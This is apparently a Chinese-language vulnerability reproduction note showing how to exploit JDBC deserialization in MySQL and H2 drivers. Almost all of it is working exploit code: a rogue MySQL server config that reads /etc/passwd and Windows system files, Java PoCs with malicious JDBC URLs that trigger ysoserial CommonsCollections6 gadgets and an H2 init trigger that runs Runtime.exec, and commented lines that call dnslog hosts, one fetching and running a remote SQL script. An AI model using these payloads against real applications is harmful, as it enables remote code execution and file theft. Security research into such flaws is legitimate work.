JDBC反序列化漏洞简单利用

漏洞复现
, ,

JDBC反序列化漏洞简单利用

创建一个maven的项目

启动一个恶意的MySQL

python2 rogue_mysql_server.py

image

1
2
3
4
5
6
7
8
9
10
11
12
13
package poc;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class TestJDBC {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "jdbc:mysql://127.0.0.1:3306/mysql?useSSL=false&allowLoadLocalInfile=true&maxAllowedPacket=65535";
        Connection conn = DriverManager.getConnection(url);
    }
}

image

弹计算器1:

python37 server.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
{
    "config":{
        "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"]
    }
}

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class Test2 {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "";
//        url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true" +
//                "&user=yso_URLDNS_http://blqr5c.dnslog.cn/";
        url = "jdbc:mysql://localhost:3306/mysql?characterEncoding=utf8&useSSL=false&maxAllowedPacket=65535&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true" +
                "&user=yso_CommonsCollections6_calc";
        Connection conn = DriverManager.getConnection(url);
    }
}

image

弹计算器2:

python37 server.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
{
    "config":{
        "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"]
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
package poc;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;


public class test3 {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.cj.jdbc.Driver");
        String url = "";

        url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('calc')\n" +
                "$$\n";
        //url = "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://evil1.dnslog.ceye.io/h2.sql'";

        Connection conn = DriverManager.getConnection(url);
    }

}

image